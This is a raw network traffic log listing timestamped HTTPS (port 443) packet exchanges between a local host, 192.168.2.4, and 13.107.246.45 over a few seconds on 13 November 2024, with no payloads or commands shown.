Nov 13, 2024 18:44:22.348244905 CET	443	49828	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.348460913 CET	49828	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.348462105 CET	49828	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.348462105 CET	49828	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.350274086 CET	49832	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.350366116 CET	443	49832	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.350455999 CET	49832	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.350554943 CET	49832	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.350574970 CET	443	49832	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.446078062 CET	443	49825	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.454705954 CET	49825	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.454771042 CET	443	49825	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.455082893 CET	49825	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.455137968 CET	443	49825	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.575741053 CET	49828	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.575813055 CET	443	49828	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.587194920 CET	443	49825	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.587388039 CET	443	49825	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.587471962 CET	49825	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.587555885 CET	49825	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.587555885 CET	49825	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.587598085 CET	443	49825	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.587627888 CET	443	49825	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.590354919 CET	49833	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.590389013 CET	443	49833	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.590450048 CET	49833	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.590590954 CET	49833	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.590603113 CET	443	49833	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.603574038 CET	443	49829	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.603871107 CET	49829	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.603933096 CET	443	49829	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.604221106 CET	49829	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.604233980 CET	443	49829	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.745862007 CET	443	49829	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.746484041 CET	443	49829	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.746563911 CET	49829	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.746588945 CET	443	49829	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.746697903 CET	49829	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.746697903 CET	49829	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.746716022 CET	443	49829	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.747042894 CET	443	49829	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.748696089 CET	49834	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.748790026 CET	443	49834	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.748889923 CET	49834	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.749003887 CET	49834	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.749025106 CET	443	49834	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.797744989 CET	443	49830	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.798260927 CET	49830	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.798327923 CET	443	49830	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.798573971 CET	49830	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.798589945 CET	443	49830	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.928167105 CET	443	49830	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.928572893 CET	443	49830	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.928870916 CET	49830	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.928872108 CET	49830	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.928872108 CET	49830	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.930941105 CET	49835	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.930988073 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.931185007 CET	49835	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.931333065 CET	49835	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.931349039 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.950947046 CET	443	49831	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.951401949 CET	49831	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.951464891 CET	443	49831	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:22.951658964 CET	49831	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:22.951673985 CET	443	49831	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.080804110 CET	443	49831	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.080838919 CET	443	49831	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.080895901 CET	443	49831	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.081214905 CET	49831	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.081311941 CET	49831	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.081311941 CET	49831	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.081355095 CET	443	49831	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.081393003 CET	443	49831	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.083626986 CET	49836	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.083715916 CET	443	49836	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.084028959 CET	49836	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.084028959 CET	49836	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.084162951 CET	443	49836	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.123842001 CET	443	49832	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.124313116 CET	49832	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.124358892 CET	443	49832	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.124732018 CET	49832	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.124738932 CET	443	49832	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.232037067 CET	49830	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.232103109 CET	443	49830	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.263988972 CET	443	49832	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.264041901 CET	443	49832	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.264115095 CET	49832	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.264235020 CET	49832	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.264281034 CET	443	49832	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.264312983 CET	49832	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.264328957 CET	443	49832	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.266479015 CET	49837	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.266524076 CET	443	49837	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.266601086 CET	49837	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.266871929 CET	49837	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.266916990 CET	443	49837	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.350111961 CET	443	49833	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.350758076 CET	49833	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.350788116 CET	443	49833	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.351090908 CET	49833	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.351099014 CET	443	49833	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.483266115 CET	443	49833	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.483489037 CET	443	49833	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.483671904 CET	49833	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.483671904 CET	49833	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.483716011 CET	49833	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.483733892 CET	443	49833	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.486124039 CET	49838	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.486219883 CET	443	49838	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.486536980 CET	49838	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.486536980 CET	49838	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.486670971 CET	443	49838	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.496157885 CET	443	49834	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.496519089 CET	49834	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.496561050 CET	443	49834	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.496913910 CET	49834	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.496928930 CET	443	49834	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.628057957 CET	443	49834	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.628242970 CET	443	49834	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.628318071 CET	49834	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.628422022 CET	49834	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.628422976 CET	49834	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.628452063 CET	443	49834	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.628474951 CET	443	49834	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.630760908 CET	49839	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.630805969 CET	443	49839	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.631047010 CET	49839	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.631047010 CET	49839	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.631115913 CET	443	49839	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.675589085 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.676053047 CET	49835	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.676086903 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.676512003 CET	49835	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.676541090 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.813328981 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.813402891 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.813462973 CET	49835	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.813482046 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.813525915 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.813576937 CET	49835	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.815670967 CET	49835	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.815687895 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.815700054 CET	49835	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.815706015 CET	443	49835	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.818314075 CET	49840	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.818339109 CET	443	49840	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.818392992 CET	49840	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.818547964 CET	49840	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.818558931 CET	443	49840	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.833128929 CET	443	49836	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.833487988 CET	49836	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.833518982 CET	443	49836	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.833935976 CET	49836	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.833945036 CET	443	49836	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.963773012 CET	443	49836	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.963855028 CET	443	49836	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.964070082 CET	49836	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.964158058 CET	49836	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.964158058 CET	49836	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.964200974 CET	443	49836	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.964232922 CET	443	49836	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.966408968 CET	49841	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.966505051 CET	443	49841	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.966578960 CET	49841	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.966716051 CET	49841	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.966737032 CET	443	49841	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.996695995 CET	443	49837	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.997314930 CET	49837	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.997348070 CET	443	49837	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:23.997639894 CET	49837	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:23.997667074 CET	443	49837	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.129014015 CET	443	49837	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.129057884 CET	443	49837	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.129307985 CET	49837	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.129353046 CET	49837	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.129353046 CET	49837	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.129374981 CET	443	49837	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.129390001 CET	443	49837	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.131198883 CET	49842	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.131243944 CET	443	49842	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.131324053 CET	49842	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.131431103 CET	49842	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.131441116 CET	443	49842	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.404577017 CET	443	49838	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.405195951 CET	49838	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.405286074 CET	443	49838	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.405587912 CET	49838	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.405646086 CET	443	49838	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.530921936 CET	443	49839	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.531670094 CET	49839	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.531759024 CET	443	49839	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.531958103 CET	49839	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.531975031 CET	443	49839	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.535206079 CET	443	49838	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.535393953 CET	443	49838	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.535604954 CET	49838	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.535604954 CET	49838	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.535604954 CET	49838	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.538419962 CET	49843	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.538491964 CET	443	49843	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.538588047 CET	49843	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.538739920 CET	49843	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.538773060 CET	443	49843	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.560003042 CET	443	49840	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.560381889 CET	49840	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.560412884 CET	443	49840	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.560725927 CET	49840	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.560733080 CET	443	49840	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.657430887 CET	443	49839	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.657924891 CET	443	49839	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.658050060 CET	443	49839	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.658102989 CET	49839	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.658139944 CET	49839	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.658174038 CET	49839	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.658195019 CET	443	49839	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.658209085 CET	49839	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.658216000 CET	443	49839	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.660655022 CET	49844	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.660697937 CET	443	49844	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.660880089 CET	49844	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.660999060 CET	49844	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.661017895 CET	443	49844	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.692851067 CET	443	49840	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.693022966 CET	443	49840	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.693154097 CET	49840	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.693154097 CET	49840	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.693197966 CET	49840	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.693214893 CET	443	49840	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.695549965 CET	49845	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.695637941 CET	443	49845	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.695941925 CET	49845	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.695941925 CET	49845	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.696075916 CET	443	49845	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.716589928 CET	443	49841	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.717015028 CET	49841	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.717044115 CET	443	49841	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.717324972 CET	49841	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.717334032 CET	443	49841	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.841413021 CET	49838	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.841479063 CET	443	49838	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.873492956 CET	443	49841	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.873532057 CET	443	49841	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.873596907 CET	443	49841	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.873599052 CET	49841	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.873662949 CET	49841	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.873723984 CET	49841	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.873723984 CET	49841	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.873763084 CET	443	49841	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.873790979 CET	443	49841	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.874111891 CET	443	49842	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.874584913 CET	49842	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.874629021 CET	443	49842	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.874995947 CET	49842	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.875004053 CET	443	49842	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.876823902 CET	49846	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.876867056 CET	443	49846	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:24.877089024 CET	49846	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.877144098 CET	49846	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:24.877157927 CET	443	49846	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.004489899 CET	443	49842	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.004548073 CET	443	49842	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.004909039 CET	49842	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.004909039 CET	49842	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.004909039 CET	49842	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.007250071 CET	49847	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.007339954 CET	443	49847	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.007460117 CET	49847	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.007821083 CET	49847	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.007914066 CET	443	49847	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.288695097 CET	443	49843	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.289237976 CET	49843	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.289273024 CET	443	49843	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.289531946 CET	49843	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.289546013 CET	443	49843	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.310062885 CET	49842	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.310095072 CET	443	49842	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.421705961 CET	443	49843	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.421857119 CET	443	49843	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.422018051 CET	49843	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.422060013 CET	49843	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.422060966 CET	49843	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.422080994 CET	443	49843	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.422096968 CET	443	49843	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.424727917 CET	49848	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.424814939 CET	443	49848	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.424932957 CET	49848	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.425220966 CET	49848	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.425307989 CET	443	49848	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.440300941 CET	443	49845	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.440725088 CET	49845	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.440788984 CET	443	49845	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.440908909 CET	443	49844	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.441088915 CET	49845	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.441145897 CET	443	49845	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.441241026 CET	49844	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.441272974 CET	443	49844	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.441521883 CET	49844	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.441550016 CET	443	49844	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.571052074 CET	443	49845	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.571127892 CET	443	49845	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.571235895 CET	443	49845	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.571341038 CET	49845	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.571341038 CET	49845	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.571432114 CET	49845	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.571432114 CET	49845	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.571471930 CET	443	49845	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.571508884 CET	443	49845	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.573977947 CET	49849	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.574017048 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.574090004 CET	49849	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.574238062 CET	49849	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.574254036 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.575889111 CET	443	49844	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.576050043 CET	443	49844	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.576215029 CET	49844	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.576215982 CET	49844	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.576215982 CET	49844	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.577903032 CET	49850	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.577995062 CET	443	49850	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.578083992 CET	49850	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.578198910 CET	49850	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.578226089 CET	443	49850	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.629250050 CET	443	49846	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.629812956 CET	49846	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.629877090 CET	443	49846	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.629998922 CET	49846	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.630012989 CET	443	49846	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.753873110 CET	443	49847	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.754337072 CET	49847	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.754401922 CET	443	49847	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.754681110 CET	49847	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.754738092 CET	443	49847	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.760727882 CET	443	49846	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.760940075 CET	443	49846	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.761086941 CET	49846	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.761086941 CET	49846	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.761086941 CET	49846	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.762989998 CET	49851	443	192.168.2.4	13.107.246.45
